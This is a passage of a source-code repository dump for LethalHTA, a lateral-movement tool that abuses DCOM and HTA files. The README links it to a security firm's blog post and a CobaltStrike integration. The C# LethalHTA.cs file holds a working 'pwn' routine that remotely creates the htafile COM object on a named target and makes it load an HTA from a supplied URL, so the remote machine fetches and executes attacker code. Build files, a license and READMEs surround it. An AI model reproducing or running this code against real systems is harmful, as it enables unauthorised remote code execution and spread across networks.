pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] [MarshalAs(UnmanagedType.LPWStr)] string pszDisplayName, out uint pchEaten, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkOut); 110 | 111 | [MethodImpl(MethodImplOptions.InternalCall)] 112 | void IsSystemMoniker( out uint pdwMksys); 113 | } 114 | 115 | [ComImport] 116 | [Guid("00000003-0000-0000-C000-000000000046")] 117 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 118 | [ComConversionLoss] 119 | public interface IMarshal 120 | { 121 | [MethodImpl(MethodImplOptions.InternalCall)] 122 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid); 123 | 124 | [MethodImpl(MethodImplOptions.InternalCall)] 125 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize); 126 | 127 | [MethodImpl(MethodImplOptions.InternalCall)] 128 | void MarshalInterface([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS); 129 | 130 | [MethodImpl(MethodImplOptions.InternalCall)] 131 | void UnmarshalInterface([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] ref Guid riid, out IntPtr ppv); 132 | 133 | [MethodImpl(MethodImplOptions.InternalCall)] 134 | void ReleaseMarshalData([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm); 135 | 136 | [MethodImpl(MethodImplOptions.InternalCall)] 137 | void DisconnectObject([In] uint dwReserved); 138 | } 139 | 140 | [Guid("79EAC9C9-BAF9-11CE-8C82-00AA004BA90B")] 141 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 142 | interface IPersistMoniker 143 | { 144 | void GetClassID(out Guid p0); 145 | void IsDirty(); 146 | void Load(uint fFullyAvailable, LethalHTADotNet.IMoniker pimkName, IBindCtx pibc, uint grfMode); 147 | void Save(LethalHTADotNet.IMoniker pimkName, IBindCtx pbc, uint fRemember); 148 | void SaveCompleted(LethalHTADotNet.IMoniker pimkName, IBindCtx pibc); 149 | void GetCurMoniker(out LethalHTADotNet.IMoniker ppimkName); 150 | } 151 | } 152 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/LethalHTA.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using static LethalHTADotNet.ComUtils; 3 | 4 | namespace LethalHTADotNet 5 | { 6 | public class LethalHTA 7 | { 8 | static Guid iUnknown = new Guid("00000000-0000-0000-C000-000000000046"); 9 | static Guid htafile = new Guid("3050F4D8-98B5-11CF-BB82-00AA00BDCE0B"); 10 | 11 | public void pwn(string target, string htaUrl) 12 | { 13 | try 14 | { 15 | IMoniker moniker; 16 | CreateURLMonikerEx(IntPtr.Zero, htaUrl, out moniker, 0); 17 | 18 | MULTI_QI[] mqi = new MULTI_QI[1]; 19 | mqi[0].pIID = IID_IUnknownPtr; 20 | 21 | COSERVERINFO info = new COSERVERINFO(); 22 | info.pwszName = target; 23 | info.dwReserved1 = 0; 24 | info.dwReserved2 = 0; 25 | info.pAuthInfo = IntPtr.Zero; 26 | 27 | CoCreateInstanceEx(htafile, null, CLSCTX.CLSCTX_REMOTE_SERVER, info, 1, mqi); 28 | if (mqi[0].hr != 0) 29 | { 30 | Console.WriteLine("Creating htafile COM object failed on target"); 31 | return; 32 | } 33 | 34 | IPersistMoniker iPersMon = (IPersistMoniker)mqi[0].pItf; 35 | FakeObject fake = new FakeObject(moniker); 36 | iPersMon.Load(0, fake, null, 0); 37 | } 38 | catch (Exception e) 39 | { 40 | Console.WriteLine("Exception: " + e); 41 | } 42 | } 43 | 44 | 45 | public static void Main(string[] args) 46 | { 47 | 48 | if (args.Length != 2) 49 | { 50 | Console.WriteLine("LethalHTADotNet.exe target url/to/hta"); 51 | return; 52 | } 53 | LethalHTA hta = new LethalHTA(); 54 | hta.pwn(args[0], args[1]); 55 | 56 | } 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/LethalHTADotNet.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6} 8 | Exe 9 | LethalHTADotNet 10 | LethalHTADotNet 11 | v2.0 12 | 512 13 | true 14 | 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | true 38 | bin\x64\Debug\ 39 | DEBUG;TRACE 40 | full 41 | x64 42 | prompt 43 | MinimumRecommendedRules.ruleset 44 | true 45 | 46 | 47 | bin\x64\Release\ 48 | TRACE 49 | true 50 | pdbonly 51 | x64 52 | prompt 53 | MinimumRecommendedRules.ruleset 54 | true 55 | 56 | 57 | LethalHTADotNet.LethalHTA 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("LethalHTADotNet")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("LethalHTADotNet")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DotNet/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTADotNet 2 | VisualStudio project of the C# implementation of LethalHTA. 3 | 4 | 5 | ## Usage 6 | ```cmd 7 | LethalHTADotNet.exe 8 | 9 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Code White GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Native/LethalHTA.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27703.2035 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LethalHTA", "LethalHTA\LethalHTA.vcxproj", "{32AB6C37-D492-466B-8151-D91096E2E114}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x64.ActiveCfg = Debug|x64 17 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x64.Build.0 = Debug|x64 18 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x86.ActiveCfg = Debug|Win32 19 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x86.Build.0 = Debug|Win32 20 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x64.ActiveCfg = Release|x64 21 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x64.Build.0 = Release|x64 22 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x86.ActiveCfg = Release|Win32 23 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {EEFEF59C-2C96-44DA-853C-F9B57D50995D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Native/LethalHTA/LethalHTA.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/LethalHTA.cpp -------------------------------------------------------------------------------- /Native/LethalHTA/LethalHTA.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {32AB6C37-D492-466B-8151-D91096E2E114} 24 | Win32Proj 25 | LethalHTA 26 | 10.0.17134.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | Use 102 | Level3 103 | Disabled 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Use 116 | Level3 117 | MaxSpeed 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | Use 134 | Level3 135 | MaxSpeed 136 | true 137 | true 138 | true 139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | Create 157 | Create 158 | Create 159 | Create 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /Native/LethalHTA/LethalHTA.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | -------------------------------------------------------------------------------- /Native/LethalHTA/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/stdafx.cpp -------------------------------------------------------------------------------- /Native/LethalHTA/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/stdafx.h -------------------------------------------------------------------------------- /Native/LethalHTA/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/targetver.h -------------------------------------------------------------------------------- /Native/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA 2 | VisualStudio project of the native implementation of LethalHTA. 3 | 4 | ## Usage 5 | ```cmd 6 | LethalHTA.exe 7 | 8 | ``` 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA 2 | Repo for our Lateral Movement technique using DCOM and HTA. 3 | 4 | For details see our blog post https://codewhitesec.blogspot.com/2018/07/lethalhta.html. 5 | 6 | # Repo structure 7 | 8 | * CobaltStrike - The CobaltStrike integration of LethalHTADotNet 9 | * DotNet - VisualStudio project for LethalHTADotNet 10 | * Native - VisualStudio project for LethalHTA 11 | --------------------------------------------------------------------------------